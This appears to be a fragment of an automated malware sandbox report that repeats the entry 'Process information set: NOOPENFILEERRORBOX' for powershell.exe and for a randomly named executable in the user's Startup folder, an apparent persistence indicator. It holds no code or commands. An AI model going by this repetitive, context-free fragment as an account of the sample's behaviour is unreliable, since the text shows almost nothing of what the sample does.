                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
